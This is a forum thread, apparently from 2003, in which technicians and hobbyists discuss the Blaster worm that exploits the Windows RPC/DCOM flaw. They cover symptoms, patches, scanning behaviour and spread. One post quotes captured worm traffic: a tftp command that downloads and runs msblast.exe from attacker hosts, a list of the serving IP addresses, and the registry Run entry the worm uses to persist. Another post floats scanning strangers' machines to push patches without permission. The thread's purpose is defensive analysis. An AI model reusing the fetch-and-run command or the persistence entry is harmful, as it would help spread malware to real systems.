RPC / DCom exploit

[neta1o]

Hmph, I found it interesting that this thread re-appeared today. I work as a Computer Tech at a local shop and we had about 12 phone calls and 4 computers come in today for errors due to this exploit. It seemed that it would cause a svchost error and then reboot in 60sec related to RPC. I found the patches mentioned above and they seemed to take care of any and all problems.

Note: The computers all had DSO exploit on them as well when I ran spybot

LINK: Microsoft Support Download Windows XP

my2cents

[Plastic]

yea... about 30 seconds ago my friend was having an attack, everytime he booted his computer up.. he had to call me cause he unplugged his ethernet cable...

this is a very problematic exploit, if i must say so myself

[Chinchilla06]

lmao, yea it is, i have been thinking whether i should make a script that connects too all IP's , 1-255 each one, and issue commands to tftp the patch and install it.. (i won't be back to answer any opinions, real busy with programming, and working on site, www.kicktd.com ) But i will end up having legal problems, even tho i fixed their computers without any intent to harm them i still can go to jail by just entering..

[grobyccil]

Hi people!
Hispasec (www.hispasec.com) report today a new worm based on RPC exploit...
The worm send commands to windows shell in tcp port 4444.
There is captured traffic...

-------------trafic 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
-------------tráfico 4444/tcp----------

mblast.exe is a Windows file, 6 KB len.
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)

The download is from this tftp servers:

204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3

The worm make a entry in Windows registry:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

"windows auto update"="msblast.exe"
****************************************************************************************

Keep the eyes open!!

See u!
Groby

[Tedob1]

nebulus200 alredy reported it here:

http://www.antionline.com/showthread...226#post651989

although your has some updated info. thanks!

you know you gotta feel sorry for the guy that looks at this list and says...my god...thats my IP address!

[Plastic]

Originally posted here by Chinchilla06
lmao, yea it is, i have been thinking whether i should make a script that connects too all IP's , 1-255 each one, and issue commands to tftp the patch and install it.. (i won't be back to answer any opinions, real busy with programming, and working on site, www.kicktd.com ) But i will end up having legal problems, even tho i fixed their computers without any intent to harm them i still can go to jail by just entering..

yea, I don't think that'd be such a good idea

[grobyccil]

most of the servers are in covad.net and attbi.com. The others are in san.rr.com and lsan03.pacbell.net. I believe that this could indicate from where it was begun to spread the worm.

[Palemoon]

Well as the debate rages I understand Teds point from the fact that and I'm not dissing anyone here he speaks from the trenches of an actual work enviroment, and that many tech workers do not understand. Ya got it Covad, Comcast, ATT etc are all infected with a worm on systems sold out of the box and subscribe to services by the above that make no mention nor provide a simple out of the box as you buy the service firewall, from either M$ or ISP yet day to day the "NOISE" of script kiddies and auto worms grow. Me I watch the logs and filter out the latest worm put in my 8 hours and have a life outside the server room. Tweak away I'll only see the tweaks those I'll watch, where the worm grows hell today on my home system 600 hits today think I'll bother to take notice other then another unsual spike. Oops did not make sense again LOL..Simple firewall takes care of it if it's blocked why sweat it...hope they did not deface the ProzacPez page

[Tedob1]

i just scanned a sub net of verizons where i have a remote location. i got one hit on 4444. did a GET /http1.0 and got the adsubtract response. and stopped at that.

does anyone know if this worm is using the adsubtract proxy as one of its components like some irc.backdoors use mIRC. or is it just trying to appear like an adsubtract sever (which also listens on port 4444) to avoid detection. even though chances of that are slim to none now

im tempeted (but not convinced) to d/l the dammed thing just to join the MS party on saturday.

palemoon! how in hell are you? haven't seen you in a coons age!

[dynamoo]

I did some scanning for open ports 4444 and it came up with about 1%-2% on my ISP with those ports open, but that doesn't mean that the machines are infected because lots of applications use TFTP.

IP address ranges used in seems to be the same as the original probing scans, meaning that the worm concentrates on a sort of Class B subnet of 65,536 hosts relative to itself, so if the infected PC has an IP of 12.34.56.78, it will spend most of its time scanning 12.34.x.x, some additional time scanning 12.x.x.x and then a quite small amount of time on random scanning. This is pretty similar to Code Red.

The worm will also survive a reboot (unlike Code Red). This means that it's possible for an infected laptop to bring the worm into a corporate environment if used on an insecure ISP connection and then brought into the office, neatly getting around the firewall. The scanning pattern would then be very effective at infecting a corporate network.

Reports indicate that this seems to impact XP and 2000, but not NT.

There also appears to be no email component to this.. a major threat would be if this kind of worm was combined with an email mass-mailer. Maybe the next version of this will have a mass-mailer. In any case, continue patching even if your firewall is holding.

I'm getting several probes per minute at the moment on this, I don't know about anyone else.